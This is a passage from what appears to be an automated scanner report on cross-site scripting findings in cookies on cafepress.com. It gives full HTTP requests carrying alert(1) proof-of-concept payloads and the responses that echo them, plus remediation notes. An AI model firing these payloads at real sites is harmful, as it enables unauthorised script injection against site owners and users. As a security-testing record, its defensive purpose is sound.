window.cafepress...[SNIP]...
1.2. http://www.cafepress.com/ [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc0ca"-alert(1)-"bbefee824fc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 75201 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.3. http://www.cafepress.com/ [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbea</script><script>alert(1)</script>c2b3851b0e4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=adbea</script><script>alert(1)</script>c2b3851b0e4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 75223 Date: Sun, 26 Dec 2010 13:46:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75223 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = 'adbea</script><script>alert(1)</script>c2b3851b0e4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e15e"-alert(1)-"05104e4ef1f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 93201 Date: Sun, 26 Dec 2010 13:46:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2434e</script><script>alert(1)</script>da77cba4a3a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2434e</script><script>alert(1)</script>da77cba4a3a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 Cteonnt-Length: 93261 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=49f12%00%0d%0a462543dabee; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '2434e</script><script>alert(1)</script>da77cba4a3a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5445"-alert(1)-"653f5650114 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 93186 Date: Sun, 26 Dec 2010 13:46:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93186 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f9d</script><script>alert(1)</script>c7da687b934 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 